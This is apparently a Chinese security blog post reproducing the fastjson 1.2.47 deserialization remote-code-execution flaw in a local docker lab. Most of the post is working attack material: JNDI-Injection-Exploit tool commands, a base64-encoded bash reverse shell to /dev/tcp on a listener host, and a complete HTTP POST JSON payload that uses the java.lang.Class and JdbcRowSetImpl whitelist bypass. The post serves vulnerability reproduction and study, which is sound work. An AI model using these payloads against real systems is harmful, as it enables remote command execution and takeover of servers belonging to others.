漏洞简介
fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令
环境搭建
环境搭建完毕,访问http://192.168.0.140:8090/,得到如下页面
验证漏洞的存在
访问http://192.168.0.140:8090 抓包,修改数据包,就可以更新服务器端的信息
GET修改成POST,再添加
Content-Type:application/json
{"name":"alsly","age":20}
命令执行
1、利用工具自动开启RMI和LDAP服务以及发布Exploit类
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行的命令" -A "vpsip"
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/access" -A "192.168.0.1"
2、构造数据包,发送payload
2、进入终端,查看文件是否生成(确认命令正常执行)
1)进入终端
docker ps
docker exec -it 容器id bash
docker exec -it cdb842d6e03c bash
2)查看是否存在创建的文件,存在!
反弹shell
1)构造命令,反弹shell
bash -i >& /dev/tcp/192.168.0.128/6666 0>&1-> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ== #base64编码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.1"
2)开启监听
3)构造数据包,发送payload
POST / HTTP/1.1
Host: 192.168.0.140:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type:application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 266
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.0.1:1099/dab1pj",
"autoCommit":true
}
}
4)等待片刻,获得反弹shell
本文标题:fastjson 1.2.47-rce漏洞复现
本文链接:https://blog.langsasec.cn/index.php/2023/02/08/fastjson-1-2-47-rce%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0/
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
本文链接:https://blog.langsasec.cn/index.php/2023/02/08/fastjson-1-2-47-rce%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0/
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
